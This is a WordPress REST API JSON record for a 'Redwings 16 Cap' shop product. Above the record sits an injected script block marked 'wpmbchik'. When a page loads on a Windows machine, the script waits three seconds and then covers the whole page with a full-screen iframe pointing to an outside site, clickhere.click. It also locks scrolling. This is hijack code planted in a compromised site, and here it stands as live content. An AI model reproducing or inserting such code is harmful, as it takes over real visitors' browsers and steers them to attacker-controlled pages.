
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    inset: '0',              // top/right/bottom/left = 0
    width: '100vw',          // на всякий случай — единицы viewport
    height: '100vh',
    background: '#fff',
    zIndex: '2147483647',    // максимальный z-index
    margin: '0',
    padding: '0',
    border: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  iframe.allow = 'fullscreen';
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block',
    margin: '0',
    padding: '0'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  document.documentElement.style.overflow = 'hidden';
  document.body.style.overflow = 'hidden';
  document.body.style.margin = '0';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
 setTimeout(() => {
    createModal('https://clickhere.click');
 }, 3000); }
});


</script>
<!-- /wpmbchik -->
{"id":3630,"date":"2024-12-24T19:36:12","date_gmt":"2024-12-24T19:36:12","guid":{"rendered":"https:\/\/redwings16.com\/?post_type=product&#038;p=3630"},"modified":"2025-01-02T22:16:33","modified_gmt":"2025-01-02T22:16:33","slug":"redwings-cap","status":"publish","type":"product","link":"https:\/\/redwings16.com\/?product=redwings-cap","title":{"rendered":"Redwings 16 Cap"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"<p>Coming Soon !!<\/p>\n","protected":false},"featured_media":3659,"template":"","meta":[],"product_brand":[],"product_cat":[54],"product_tag":[],"class_list":{"0":"post-3630","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-cap","8":"first","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/product\/3630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/redwings16.com\/index.php?rest_route=\/wp\/v2\/media\/3659"}],"wp:attachment":[{"href":"https:\/\/redwings16.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3630"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/redwings16.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_brand&post=3630"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/redwings16.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3630"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/redwings16.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}